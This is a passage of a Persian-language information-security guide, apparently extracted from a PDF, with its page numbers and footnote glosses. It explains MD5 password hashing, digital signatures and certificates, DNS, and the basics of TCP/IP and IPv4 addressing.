‫ﺍﻣﻜﺎﻧﭙﺬﻳﺮ ﻧﻴﺴﺖ ﻭ ﺑﺎﻳﺪ ﻳﻚ ﺭﻣـﺰ ﻋﺒـﻮﺭ ﺟﺪﻳـﺪ ﺍﻧﺘﺨـﺎﺏ‬
‫ﮔﺮﺩﺩ‪ .‬ﺍﺯ ﺍﻳﻦ ﺭﻭﺵ ﺑﺮﺍﻱ ﺍﻳﻦ ﻣﻨﻈﻮﺭ ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﺷﻮﺩ ﻛﻪ‬
‫ﺍﺻﻞ ﺭﻣﺰ ﻋﺒﻮﺭ ﻫﻴﭽﮕﺎﻩ ﻧﺘﻮﺍﻧﺪ ﺩﺭ ﻗﺎﻟﺐ ﺍﺻﻠﻲ ﺧـﻮﺩ ﺑـﻪ‬
‫ﻧﻤﺎﻳﺶ ﺩﺭﺁﻳﺪ‪.‬‬
‫ﻣﺘﺄﺳﻔﺎﻧﻪ ﻫﻨﻮﺯ ﻳﻚ ﻣﺸﻜﻞ ﻭﺟﻮﺩ ﺩﺍﺭﺩ ﻛﻪ ﺑـﻪ ﺩﻟﻴـﻞ ﺁﻥ‬
‫ﻛﺎﺭﺑﺮ ﻧﺒﺎﻳﺪ ﺍﺯ ﺭﻣﺰﻫﺎﻱ ﻋﺒـﻮﺭ ﻛﻮﺗـﺎﻩ‪ ،‬ﺳـﺎﺩﻩ ﻭ ﻳـﺎ ﻗﺎﺑـﻞ‬
‫ﺣﺪﺱ ﺍﺳﺘﻔﺎﺩﻩ ﻛﻨﺪ ﻭ ﺁﻥ ﺍﻳﻨﻜﻪ ﺍﮔـﺮ ﻛـﺴﻲ ﻓﻬﺮﺳـﺘﻲ ﺍﺯ‬
‫ﻼ ﺍﺯ‬
‫ﺭﻣﺰﻫــﺎﻱ ﻋﺒــﻮﺭ ﺭﻣﺰﮔ ـﺬﺍﺭﻱﺷــﺪﻩ ﺑﺪﺳــﺖ ﺁﻭﺭﺩ )ﻣــﺜ ﹰ‬
‫ﺳﻴﺴﺘﻤﻲ ﻛﻪ ﺑﻪ ﺁﻥ ﻧﻔﻮﺫ ﻛﺮﺩﻩ( ﺑﺴﻴﺎﺭ ﺳﺎﺩﻩ ﺧﻮﺍﻫـﺪ ﺑـﻮﺩ ﻛـﻪ‬
‫ﻫﻤﻪ ﺭﻣﺰﻫﺎﻱ ﻋﺒﻮ ﹺﺭ ﺳﺎﺩﺓ ﻣﻤﻜﻦ ﺭﺍ ﺭﻣﺰﮔـﺬﺍﺭﻱ ﻧﻤـﻮﺩﻩ ﻭ‬
‫ﺑﺎ ﻧﻤﻮﻧﻪﻫﺎﻱ ﺭﻣﺰﮔﺬﺍﺭﻱﺷﺪﺓ ﻣﻮﺟﻮﺩ ﺩﺭ ﺳﻴـﺴﺘﻢ ﺗﻄﺒﻴـﻖ‬
‫ﺩﻫﺪ ﻭ ﺑﺪﻳﻦ ﺗﺮﺗﻴﺐ ﺭﻣﺰﻫﺎﻱ ﻋﺒﻮﺭ ﺳﺎﺩﺓ ﺳﻴﺴﺘﻢ ﺭﺍ ﭘﻴـﺪﺍ‬
‫ﻛﻨﺪ‪.‬‬
‫ﺍﻣﻀﺎﻱ ﺩﻳﺠﻴﺘﺎﻟﻲ‬
‫ﺷﻤﺎ ﻣﻲ ﺗﻮﺍﻧﻴﺪ ﻳـﻚ ﺳـﻨﺪ ﻃـﻮﻻﻧﻲ ﻳـﺎ ﻳـﻚ ﺑﺮﻧﺎﻣـﻪ ﺭﺍ‬
‫ﺑﺮﮔﺰﻳﻨﻴــﺪ‪ ،‬ﻛــﺪ ‪ MD5‬ﺭﺍ ﺑــﺮﺍﻱ ﺁﻥ ﻣﺤﺎﺳــﺒﻪ ﻭ ﺁﻧــﺮﺍ ﺩﺭ‬
‫ﻣﺤﻠﻲ ﺍﻣﻦ ﺫﺧﻴﺮﻩ ﻧﻤﺎﻳﻴﺪ‪ .‬ﻣﺪﺗﻲ ﺑﻌﺪ ﻣﻲ ﺗﻮﺍﻧﻴﺪ ﺑﻪ ﺍﺳـﻨﺎﺩ‬
‫ﺧﻮﺩ ﻣﺮﺍﺟﻌﻪ ﻭ ﺩﻭﺑﺎﺭﻩ ﺭﻭﻱ ﺁﻥ ﻫﻤﻴﻦ ﻋﻤﻠﻴﺎﺕ ﺭﺍ ﺍﻋﻤـﺎﻝ‬
‫ﻛﻨﻴﺪ‪ .‬ﻃﺒﻴﻌﺘﹰﺎ ﭼﻨﺎﻧﭽﻪ ﻛﺪ ﺟﺪﻳﺪ ﻣﺘﻤﺎﻳﺰ ﺍﺯ ﻛﺪ ﻗﺒﻠـﻲ ﺑـﻮﺩ‬
‫ﻣﺘﻮﺟﻪ ﻣﻲﺷﻮﻳﺪ ﻛﻪ ﺑﺮﻧﺎﻣﻪ ﻳﺎ ﺳـﻨﺪ ﺗﻐﻴﻴـﺮ ﻛـﺮﺩﻩ ﺍﺳـﺖ‪.‬‬
‫ﻻ ﻳﻚ ﺗﻐﻴﻴﺮ ﺑﺴﻴﺎﺭ ﺟﺰﺋﻲ ﺩﺭ ﻳﻚ ﻓﺎﻳﻞ ﺑﺰﺭﮒ ﻫـﻢ‬
‫ﻣﻌﻤﻮ ﹰ‬
‫ﺑﺎﻋﺚ ﺍﻳﺠـﺎﺩ ﺗﻐﻴﻴـﺮﺍﺕ ﺯﻳـﺎﺩﻱ ﺩﺭ ﻛـﺪ ‪ MD5‬ﻣﺮﺑﻮﻃـﻪ‬
‫ﻣﻲﺷﻮﺩ‪.‬‬
‫ﺫﺧﻴﺮﺓ ﺭﻣﺰ ﻋﺒﻮﺭ‬
‫ﺩﺭ ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﺳﻴـﺴﺘﻤﻬﺎ ﻫﻨﮕﺎﻣﻴﻜـﻪ ﻛـﺎﺭﺑﺮ ﺍﺯ ﻛﻠﻤـﻪﺍﻱ‬
‫ﺑﻌﻨﻮﺍﻥ ﺭﻣﺰ ﻋﺒﻮﺭ ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﻛﻨﺪ‪ ،‬ﺍﻳﻦ ﻛﻠﻤﻪ ﺑﺎ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ‬
‫ﺍﻟﮕــﻮﺭﻳﺘﻢ ‪) MD5‬ﻳــﺎ ﻳــﻚ ﺍﻟﮕــﻮﺭﻳﺘﻢ ﻣــﺸﺎﺑﻪ( ﺭﻣﺰﮔــﺬﺍﺭﻱ‬
‫ﻣﻲﺷﻮﺩ ﻭ ﻧﺴﺨﺔ ﺭﻣﺰﮔﺬﺍﺭﻱﺷﺪﻩ ﺫﺧﻴﺮﻩ ﻣﻲﮔﺮﺩﺩ‪ .‬ﺑﺎﺭ ﺑﻌﺪ‬
‫ﻛﻪ ﻛﺎﺭﺑﺮ ﺳﻌﻲ ﻣﻲﻛﻨﺪ ﻭﺍﺭﺩ ﺳﻴﺴﺘﻢ ﺷﻮﺩ‪ ،‬ﺁﻧﭽﻪ ﻛﻪ ﻭﺍﺭﺩ‬
‫ﻣﻲﻛﻨﺪ ﻣﺠﺪﺩﹰﺍ ﺭﻣﺰﮔﺬﺍﺭﻱ ﻣـﻲﺷـﻮﺩ ﻭ ﺑـﺎ ﺁﻧﭽـﻪ ﻛـﻪ ﺩﺭ‬
‫ﺩﻳﺴﻚ ﺫﺧﻴﺮﻩ ﺷﺪﻩ ﺑﻮﺩ ﻣﻘﺎﻳﺴﻪ ﻣﻲ ﮔـﺮﺩﺩ؛ ﻭ ﺩﺭﺻـﻮﺭﺕ‬
‫‪142 Hash‬‬
‫‪143 Message Digest 5‬‬
‫‪١٤٤‬‬
‫ﺍﮔﺮ ﺷﺨﺼﻲ ﺑﺨﻮﺍﻫﺪ ﺑﺮﺍﻱ ﺷﻤﺎ ﭘﻴﺎﻣﻲ ﺧﺼﻮﺻﻲ ﺍﺭﺳﺎﻝ ﻛﻨـﺪ ﻭ‬
‫ﺑﺨﻮﺍﻫﺪ ﺷﻤﺎ ﻣﻄﻤﺌﻦ ﺑﺎﺷﻴﺪ ﻛﻪ ﻓﺮﺳﺘﻨﺪﻩ ﺁﻥ ﭘﻴﺎﻡ ﻛـﺴﻲ ﺟـﺰ ﺍﻭ‬
‫ﻧﻴﺴﺖ‪ ،‬ﻣﻲﺗﻮﺍﻥ ﺍﺯ ﺗﺮﻛﻴﺐ ﺭﻭﺷﻬﺎﻱ ﭘﻴﺶﮔﻔﺘﻪ ﺍﺳﺘﻔﺎﺩﻩ ﻛﺮﺩ‪:‬‬
‫‪ .۱‬ﭘﻴــﺎﻡ ﺭﺍ ﻣــﻲﻧﻮﻳــﺴﺪ ﻭ ﺍﺯ ‪ MD5‬ﺑــﺮﺍﻱ ﺍﻳﺠــﺎﺩ ﻛــﺪ‬
‫ﺩﺭﻫﻢﺳﺎﺯﻱﺷﺪﻩ ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﻛﻨﺪ‪.‬‬
‫‪ .۲‬ﺑﺎ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﻛﻠﻴﺪ ﺧﺼﻮﺻﻲ ﺧﻮﺩ‪ ،‬ﻛﺪ ﺩﺭﻫﻢﺳﺎﺯﻱﺷـﺪﻩ ﺭﺍ‬
‫ﺭﻣﺰﮔﺬﺍﺭﻱ ﻣﻲﻛﻨﺪ‪.‬‬
‫‪ .۳‬ﺑﺎ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﻛﻠﻴﺪ ﻋﻤﻮﻣﻲ ﺷﻤﺎ ﻣـﺘﻦ ﭘﻴـﺎﻡ ﺭﺍ ﺭﻣﺰﮔـﺬﺍﺭﻱ‬
‫ﻣﻲﻧﻤﺎﻳﺪ‪.‬‬
‫‪ .۴‬ﭘﻴﺎﻡ ﻭ ﻛﺪ ﺩﺭﻫﻢﺳﺎﺯﻱ ﺭﻣﺰﮔﺬﺍﺭﻱﺷﺪﻩ ﺭﺍ ﺍﺭﺳﺎﻝ ﻣﻲﻛﻨﺪ‪.‬‬
‫‪ .۵‬ﺷﻤﺎ ﭘﻴﺎﻡ ﺭﺍ ﺩﺭﻳﺎﻓﺖ ﻣﻲﻛﻨﻴﺪ‪.‬‬
‫‪ .۶‬ﺑــﺎ ﺍﺳــﺘﻔﺎﺩﻩ ﺍﺯ ﻛﻠﻴــﺪ ﻋﻤــﻮﻣﻲ ﻭﻱ ﻛــﺪ ﺩﺭﻫــﻢﺳــﺎﺯﻱ ﺭﺍ‬
‫ﺭﻣﺰﮔﺸﺎﻳﻲ ﻣﻲﻧﻤﺎﻳﻴﺪ‪ ،‬ﻛﻪ ﻧﺘﻴﺠـﻪ ﺁﻥ ﺑﺪﺳـﺖ ﺁﻣـﺪﻥ ﻛـﺪ‬
‫ﺩﺭﻫﻢﺳﺎﺯﻱ ﺍﺻﻠﻲ ﺍﺳﺖ‪.‬‬
‫‪144 Digital Signature‬‬
‫ﺑﺨﺶ ﺩﻭﻡ‪ :‬ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﮐﺎﺭﺑﺮﺍﻥ ﻣﻨﻔﺮﺩ‬
‫‪١٠٩‬‬
‫‪ .۷‬ﻣﺘﻦ ﭘﻴﺎﻡ ﺍﺭﺳﺎﻟﻲ ﺭﺍ ﺑﺎ ﺍﺳـﺘﻔﺎﺩﻩ ﺍﺯ ﻛﻠﻴـﺪ ﺧـﺼﻮﺻﻲ ﺧـﻮﺩ‬
‫ﺭﻣﺰﮔﺸﺎﻳﻲ ﻣﻲﻛﻨﻴﺪ‪.‬‬
‫‪ .۸‬ﺑــﺮﺍﻱ ﻣــﺘﻦ ﭘﻴــﺎﻡ ﺍﺭﺳــﺎﻟﻲ‪ ،‬ﺑــﺎ ﺍﺳــﺘﻔﺎﺩﻩ ﺍﺯ ‪ MD5‬ﻛــﺪ‬
‫ﺩﺭﻫﻢﺳﺎﺯﻱ ﺭﺍ ﻣﺤﺎﺳﺒﻪ ﻣﻲﻧﻤﺎﻳﻴﺪ‪.‬‬
‫ﮔﻮﺍﻫﻲﻫﺎﻱ ﺩﻳﺠﻴﺘﺎﻟﻲ‪ ١٤٥‬ﻛﻪ ﺑﻮﺳـﻴﻠﻪ ﻣﺮﻭﺭﮔﺮﻫـﺎﻱ ﻭﺏ ﺑـﺮﺍﻱ‬
‫ﺗﺼﺪﻳﻖ ﻫﻮﻳﺖ ﺍﻳﻤﻦ ﻣﻮﺭﺩ ﺍﺳﺘﻔﺎﺩﻩ ﻗﺮﺍﺭ ﻣﻲﮔﻴﺮﻧﺪ ﻧﻴﺰ ﺑﺮ ﺍﺳﺎﺱ‬
‫ﻓﻨﻮﻥ ﺍﻣﻀﺎﻱ ﺩﻳﺠﻴﺘﺎﻟﻲ )ﻣﺸﺎﺑﻪ ﻣﺜﺎﻝ ﻓﻮﻕ( ﻛﺎﺭ ﻣﻲﻛﻨﻨﺪ‪.‬‬
‫‪145 Digital Certificates‬‬
‫ﺑﺨﺶ ﺩﻭﻡ‬
‫‪ .۹‬ﺍﮔﺮ ﺩﻭ ﻛـﺪ ﺩﺭﻫـﻢﺳـﺎﺯﻱ ﺑﺪﺳـﺖ ﺁﻣـﺪﻩ ﻳﻜـﺴﺎﻥ ﺑﻮﺩﻧـﺪ‬
‫ﺍﻃﻤﻴﻨﺎﻥ ﻣـﻲﻳﺎﺑﻴـﺪ ﻣـﺘﻦ ﺍﺭﺳـﺎﻟﻲ ﺗﻐﻴﻴـﺮ ﻧﻜـﺮﺩﻩﺍﺳـﺖ ﻭ‬
‫ﻓﺮﺳﺘﻨﺪﻩ ﻧﻴﺰ ﻫﻤﺎﻥ ﺷﺨﺼﻲ ﺍﺳﺖ ﻛﻪ ﺍﻧﺘﻈﺎﺭ ﺁﻧﺮﺍ ﺩﺍﺷﺘﻴﺪ‪.‬‬
‫‪١١١‬‬
‫ﺑﺨﺶ ﺩﻭﻡ‪ :‬ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﮐﺎﺭﺑﺮﺍﻥ ﻣﻨﻔﺮﺩ‬
‫ﺧﺪﻣﺎﺕ ﻧﺎﻡ ﺩﺍﻣﻨﻪ‬
‫‪١٤٧‬‬
‫ﭼﻮﻥ ﺑﻪ ﺧﺎﻃﺮ ﺳﭙﺮﺩﻥ ﺭﺷﺘﻪﻫﺎﻱ ﻃﻮﻻﻧﻲ ﺍﻋﺪﺍﺩ ﺳـﺨﺖ ﺍﺳـﺖ‬
‫ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﺭﺍﻳﺎﻧﻪﻫﺎ ﺩﺭ ﺍﻳﻨﺘﺮﻧﺖ ﺑﺎ ﺣﺮﻭﻑ ﺍﻟﻔﺒﺎ )ﻛﻪ ﻧـﺎﻡ ﻣﻴﺰﺑـﺎﻥ‬
‫ﻧﺎﻣﻴـــﺪﻩ ﻣـــﻲﺷـــﻮﻧﺪ( ﻧﺎﻣﮕـــﺬﺍﺭﻱ ﺷـــﺪﻩﺍﻧـــﺪ‪ .‬ﻧﻤﻮﻧـــﺔ ﺁﻥ‬
‫‪ www.infodev.org‬ﺍﺳﺖ‪ .‬ﻫﻨﮕﺎﻣﻴﻜﻪ ﺍﻳﻦ ﻧﺎﻡ ﺭﺍ ﺩﺭ ﻣﺮﻭﺭﮔﺮ‬
‫ﻭﺏ ﻭﺍﺭﺩ ﻛﻨﻴﺪ ﺭﺍﻳﺎﻧﻪ ﭘﻴﺎﻣﻲ ﺭﺍ ﺑـﻪ ﻳـﻚ ﺳـﺮﻭﻳﺲ ﺧـﺎﺹ ﺑﻨـﺎﻡ‬
‫‪ DNS‬ﺍﺭﺳﺎﻝ ﻣﻲﻛﻨـﺪ‪ DNS .‬ﻣـﻲﺗﻮﺍﻧـﺪ ﺣـﺮﻭﻑ ﺍﻟﻔﺒـﺎ ﺭﺍ ﺑـﻪ‬
‫ﺷﻤﺎﺭﻩ ﺗﺒﺪﻳﻞ ﻧﻤﺎﻳﺪ )ﺩﺭ ﺍﻳﻦ ﻣﺜﺎﻝ ﺷﻤﺎﺭﻩ ﻣﻮﺭﺩ ﻧﻈﺮ ‪192.86.99.121‬‬
‫ﺍﺳـﺖ(‪ .‬ﻫﻤﭽﻨﻴﻦ ‪ DNS‬ﺑﻪ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﺓ ﻭﺏ ﺍﺟﺎﺯﻩ ﻣـﻲﺩﻫـﺪ‬
‫ﻛﻪ ﺩﺭ ﻣﻜﺎﻧﻬﺎﻱ ﻣﺨﺘﻠﻒ ﺟﺎﺑﺠـﺎ ﺷـﻮﺩ؛ ﭼـﻮﻥ ﺩﺍﻣﻨـﺔ ﻣﺮﺑﻮﻃـﻪ‬
‫ﺁﺩﺭﺱ ﺟﺪﻳــﺪ ﺭﺍ ﺑــﻪ ‪ DNS‬ﺍﻃــﻼﻉ ﻣــﻲﺩﻫــﺪ ﻭ ﻟــﺬﺍ ﻛــﺎﺭﺑﺮﺍﻥ‬
‫ﻫﻤﭽﻨﺎﻥ ﻣﻲﺗﻮﺍﻧﻨﺪ ﺍﺯ ﻫﻤﺎﻥ ﻧﺎﻡ ﻣﻴﺰﺑﺎﻥ ﺍﺳﺘﻔﺎﺩﻩ ﻧﻤﺎﻳﻨﺪ‪.‬‬
‫‪١٤٨‬‬
‫ﺿﻤﻴﻤﺔ ‪۲‬‬
‫‪TCP/IP‬‬
‫‪ :IP‬ﭘﺮﻭﺗﻜﻞ ﺍﻳﻨﺘﺮﻧﺖ‬
‫‪١٤٩‬‬
‫ﻫﻨﮕﺎﻣﻴﻜﻪ ﺩﺍﺩﻩﻫﺎ ﺍﺯ ﻃﺮﻳﻖ ﺍﻳﻨﺘﺮﻧﺖ ﺍﺭﺳﺎﻝ ﻣﻲﺷﻮﻧﺪ ﺑـﻪ ﺷـﻜﻞ‬
‫ﻣﺠﻤﻮﻋﻪ ﺍﻱ ﺍﺯ ﺣﺮﻭﻑ ﻭ ﻧﺸﺎﻧﻪ ﺩﺭ ﻣﻲﺁﻳﻨﺪ ﻛﻪ ﺑﻪ ﺁﻧﻬﺎ ﺑـﺴﺘﻪ‬
‫ﻳﺎ ‪ datagram‬ﮔﻔﺘﻪ ﻣﻲﺷـﻮﺩ‪ IP .‬ﺩﺭ ‪ TCP/IP‬ﺑـﻪ ﻣﻌﻨـﺎﻱ‬
‫"ﭘﺮﻭﺗﻜﻞ ﺍﻳﻨﺘﺮﻧﺖ" ﺍﺳﺖ ﻭ ﻣﺸﺨﺺ ﻣﻲﻛﻨﺪ ﻛـﻪ ﻗﺎﻟـﺐ ﺩﺍﺧﻠـﻲ‬
‫ﺍﻳﻦ ﺑﺴﺘﻪﻫﺎ ﺑﺎﻳﺪ ﭼﮕﻮﻧﻪ ﺑﺎﺷﺪ‪ .‬ﺑﺴﺘﺔ ‪ IP‬ﺷﺎﻣﻞ ﭼﻨـﺪﻳﻦ ﺑﺨـﺶ‬
‫ﺍﻃﻼﻋﺎﺗﻲ ﺍﺳﺖ ﻛﻪ ﺩﺭ ﻣﻴﺎﻥ ﺁﻥ ﻣﻮﺍﺭﺩ ﺯﻳﺮ ﺑﻪ ﭼﺸﻢ ﻣﻲﺧﻮﺭﻧﺪ‪:‬‬
‫‪١٥٠‬‬
‫ﺁﺩﺭﺱﺩﻫﻲ ﺍﻳﻨﺘﺮﻧﺘﻲ‬
‫ﻫﺮ ﺍﺑﺰﺍﺭ ﺩﺭ ﺍﻳﻨﺘﺮﻧﺖ ﺩﺍﺭﺍﻱ ﻳﻚ ﺁﺩﺭﺱ ‪ IP‬ﻣﻲﺑﺎﺷﺪ‪ .‬ﺍﻳﻦ ﺁﺩﺭﺱ‬
‫ﺑﻄﻮﺭ ﻛﻠﻲ ﺁﻥ ﺍﺑﺰﺍﺭ ﺭﺍ ﺑﺼﻮﺭﺕ ﻣﻨﺤﺼﺮ ﺑﻪ ﻓﺮﺩ ﻣﻌﺮﻓﻲ ﻣﻲﻛﻨـﺪ؛‬
‫ﻫﻤﺎﻧﻄﻮﺭ ﻛﻪ ﺁﺩﺭﺱ ﭘﺴﺘﻲ ﺩﺭ ﺗﻤـﺎﻡ ﺩﻧﻴـﺎ ﺁﺩﺭﺱ ﺧﺎﻧـﺔ ﺷـﻤﺎ ﺭﺍ‬
‫ﻧﺸﺎﻥ ﻣﻲﺩﻫﺪ‪ .‬ﺁﺩﺭﺳﻬﺎﻱ ﻣﻮﺟﻮﺩ ﺩﺭ ﻧـﺴﺨﺔ ﺟـﺎﺭﻱ ‪TCP/IP‬‬
‫)ﻛﻪ ﺑﻪ ﻧﺎﻡ ‪ IPv4‬ﺷﻨﺎﺧﺘﻪ ﻣﻲﺷﻮﺩ( ﺍﻋﺪﺍﺩ ‪ ۳۲‬ﺑﻴﺘﻲ ﺩﻭﺩﻭﻳﻲ ﻫـﺴﺘﻨﺪ‪.‬‬
‫ﻳﻌﻨﻲ ﺗﻌﺪﺍﺩ ﺁﺩﺭﺳﻬﺎﻱ ﻣﻤﻜـﻦ‪ ۲۳۲=۴۲۹۴۹۶۷۲۹۶ ،‬ﻣـﻲﺑﺎﺷـﺪ‪.‬‬
‫ﺑﺮﺍﻱ ﻧﻤﺎﻳﺶ ﻭ ﺑﺨﺎﻃﺮ ﺳﭙﺮﺩﻥ ﺳﺎﺩﻩﺗـﺮ ﺁﻧﻬـﺎ‪ ،‬ﺍﻋـﺪﺍﺩ ‪ ۳۲‬ﺑﻴﺘـﻲ‬
‫ﺩﻭﺩﻭﻳﻲ ﺑﻪ ‪ ۴‬ﺑﺨـﺶ ‪ ۸‬ﺑﻴﺘـﻲ ﺗﻘـﺴﻴﻢﺑﻨـﺪﻱ ﺷـﺪﻩﺍﻧـﺪ‪ .‬ﭼـﻮﻥ‬
‫‪ ۲۸=۲۵۶‬ﺍﺳﺖ‪ ،‬ﻫﺮ ﺑﺨﺶ ‪ ۸‬ﺑﻴﺘﻲ ﻣﻲﺗﻮﺍﻧﺪ ﻳﻜﻲ ﺍﺯ ﺍﻋﺪﺍﺩ ‪ ۰‬ﺗـﺎ‬
‫ﻻ ﺑﺪﻧﺒﺎﻝ ﻫﻢ ﻣﻲﺁﻳﻨﺪ ﻭ ﺑـﺎ ﻳـﻚ‬
‫‪ ۲۵۵‬ﺑﺎﺷﺪ‪ .‬ﺍﻳﻦ ‪ ۴‬ﺷﻤﺎﺭﻩ ﻣﻌﻤﻮ ﹰ‬
‫ﻧﻘﻄﻪ ﺍﺯ ﻳﻜﺪﻳﮕﺮ ﺗﻔﻜﻴﻚ ﻣﻲﺷﻮﻧﺪ‪ .‬ﺑﻨﺎﺑﺮﺍﻳﻦ ﻛـﻮﭼﻜﺘﺮﻳﻦ ﺁﺩﺭﺱ‬
‫ﺍﻳﻨﺘﺮﻧﺘــﻲ ‪ 0.0.0.0‬ﻭ ﺑﺰﺭﮔﺘــﺮﻳﻦ ﺁﻥ ‪255.255.255.255‬‬
‫ﺍﺳﺖ‪ .‬ﻧﻤﻮﻧـﺔ ﻳـﻚ ﺁﺩﺭﺱ ‪ IP‬ﺑـﻪ ﺷـﻜﻞ ‪24.200.195.15‬‬
‫ﻣﻲ ﺑﺎﺷﺪ‪ .‬ﺩﺭ ﺍﻳﻨﺘﺮﻧﺖ ﺍﺑﺰﺍﺭﻱ ﺑﻨﺎﻡ ﻣﺴﻴﺮﻳﺎﺏ‪ ١٤٦‬ﻭﺟـﻮﺩ ﺩﺍﺭﺩ ﻛـﻪ‬
‫ﻣﺴﻴﺮ ﻫﺮ ﺁﺩﺭﺱ ‪ IP‬ﺭﺍ ﻧﮕﻬﺪﺍﺭﻱ ﻣﻲﻛﻨﺪ ﻭ ﻣﻲﺩﺍﻧـﺪ ﻛـﻪ ﺑـﺮﺍﻱ‬
‫ﺩﺳﺖﻳﺎﻓﺘﻦ ﺑﻪ ﻫﺮ ﺁﺩﺭﺱ ﺑﺎﻳﺪ ﻛﺪﺍﻡ ﻣﺴﻴﺮ ﺭﺍ ﺑﺮﮔﺰﻳﺪ‪.‬‬
‫‪146 Router‬‬
‫•‬
‫ﺍﻧﺪﺍﺯﺓ ﺑﺴﺘﻪ؛‬
‫•‬
‫ﺁﺩﺭﺱ ‪ IP‬ﮔﻴﺮﻧﺪﻩ؛‬
‫•‬
‫ﺁﺩﺭﺱ ‪ IP‬ﻣﺤﻠﻲ ﻛﻪ ﺑﺴﺘﻪ ﺍﺯ ﺁﻧﺠﺎ ﺍﺭﺳﺎﻝ ﻣﻲﺷﻮﺩ؛ ﻭ‬
‫•‬
‫ﻧﻮﻉ ﺑﺴﺘﻪ‪.‬‬
‫ﻫﻨﮕﺎﻣﻴﻜــﻪ ﻳــﻚ ﺑــﺴﺘﻪ ﺍﺯ ﺭﺍﻳﺎﻧــﺔ ﺷــﻤﺎ ﺍﺭﺳــﺎﻝ ﻣــﻲﺷــﻮﺩ ﺑــﻪ‬
‫ﻧﺰﺩﻳﻜﺘﺮﻳﻦ ﻣﺴﻴﺮﻳﺎﺏ ﻓﺮﺳﺘﺎﺩﻩ ﻣﻲﺷﻮﺩ ﻭ ﺁﻥ ﻧﻴﺰ ﺳﻌﻲ ﻣﻲﻛﻨـﺪ‬
‫ﺑﺴﺘﻪ ﺭﺍ ﺩﺭ ﻃﻮﻝ ﻣﺴﻴﺮ ﺑﻪ ﻣﺴﻴﺮﻳﺎﺏ ﺑﻌﺪﻱ ﺍﺭﺳﺎﻝ ﻛﻨـﺪ ﻭ ﺍﻳـﻦ‬
‫ﻛﺎﺭ ﺍﺩﺍﻣﻪ ﻣﻲﻳﺎﺑﺪ ﺗﺎ ﺑﺴﺘﻪ ﺑﻪ ﻣﻘﺼﺪ ﺧﻮﺩ ﺑﺮﺳـﺪ‪ .‬ﺍﮔـﺮ ﻣـﺸﻜﻠﻲ‬
‫ﺑﻮﺟﻮﺩ ﺁﻳﺪ ﻳﺎ ﺗﺮﺍﻛﻢ ﺑﺴﺘﻪﻫﺎ ﺯﻳﺎﺩ ﺑﺎﺷﺪ ﺑﺴﺘﻪ ﻧﻤـﻲﺗﻮﺍﻧـﺪ ﺍﺭﺳـﺎﻝ‬
‫ﺷﻮﺩ ﻭ ﺩﺭ ﻣﻴﺎﻥ ﺭﺍﻩ ﻣﺘﻮﻗﻒ ﺧﻮﺍﻫﺪ ﺷﺪ‪ .‬ﺑﻪ ﻫﻤﻴﻦ ﺩﻟﻴـﻞ ﺑـﻪ ‪IP‬‬
‫ﭘﺮﻭﺗﻜﻞ ﻏﻴﺮﻗﺎﺑﻞ ﺍﻃﻤﻴﻨﺎﻥ‪ ١٥١‬ﻣﻲﮔﻮﻳﻨﺪ‪ .‬ﺍﮔﺮﭼـﻪ ﻃﺒـﻖ ﺗﺌـﻮﺭﻱ‬
‫‪Domain Name Services‬‬
‫‪Hostname‬‬
‫‪Internet Protocol‬‬
‫‪Packet‬‬
‫‪Unreliable Protocol‬‬
‫‪147‬‬
‫‪148‬‬
‫‪149‬‬
‫‪150‬‬
‫‪151‬‬
‫ﺑﺨﺶ ﺩﻭﻡ‬
‫ﭘﺮﻭﺗﻜــﻞ ‪ TCP/IP‬ﻣﺠﻤﻮﻋــﻪﺍﻱ ﺍﺯ ﻗــﻮﺍﻧﻴﻦ ﺍﺳــﺖ ﻛــﻪ ﺗﻤــﺎﻡ‬
‫ﭘﻴﺎﻣﻬﺎﻱ ﺍﺭﺳﺎﻟﻲ ﺩﺭ ﺍﻳﻨﺘﺮﻧﺖ ﺭﺍ ﻛﻨﺘﺮﻝ ﻣﻲﻛﻨـﺪ‪ .‬ﺍﮔﺮﭼـﻪ ﻧﻴـﺎﺯﻱ‬
‫ﻧﻴﺴﺖ ﻛﻪ ﻛﺎﺭﺑﺮﺍﻥ ﻋـﺎﺩﻱ ﺑـﺮﺍﻱ ﺍﺳـﺘﻔﺎﺩﻩ ﺍﺯ ﺍﻳﻨﺘﺮﻧـﺖ ﺩﺭﺑـﺎﺭﺓ‬
‫‪ TCP/IP‬ﺍﻃﻼﻉ ﺩﺍﺷﺘﻪ ﺑﺎﺷـﻨﺪ‪ ،‬ﺍﻣـﺎ ﺑﺎﻳـﺪ ﺩﺭﺑـﺎﺭﺓ ﭘﻴﻜـﺮﺑﻨـﺪﻱ‬
‫ﺩﻳﻮﺍﺭﻩﻫﺎﻱ ﺁﺗﺶ ﻭ ﺗﻬﺪﻳﺪﺍﺕ ﺍﻳﻨﺘﺮﻧﺘﻲ ﻣﻄﺎﻟﺒﻲ ﺑﺪﺍﻧﻨﺪ‪ .‬ﺩﺭ ﺍﺩﺍﻣـﻪ‬
‫ﺷﺮﺡ ﺳﺎﺩﻩﺍﻱ ﺍﺯ ﻋﻤﻠﻜﺮﺩ ‪ TCP/IP‬ﺫﻛﺮ ﺷﺪﻩ ﺍﺳﺖ‪ .‬ﺍﮔﺮ ﺑﺎ ﺍﻳﻦ‬
‫ﻣﻔﺎﻫﻴﻢ ﺁﺷﻨﺎ ﻫﺴﺘﻴﺪ ﻣﻲﺗﻮﺍﻧﻴﺪ ﺍﺯ ﺧﻮﺍﻧﺪﻥ ﺍﻳﻦ ﻗﺴﻤﺖ ﺻـﺮﻓﻨﻈﺮ‬
‫ﻛﻨﻴﺪ‪.‬‬
‫‪١١٢‬‬
‫ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ‬
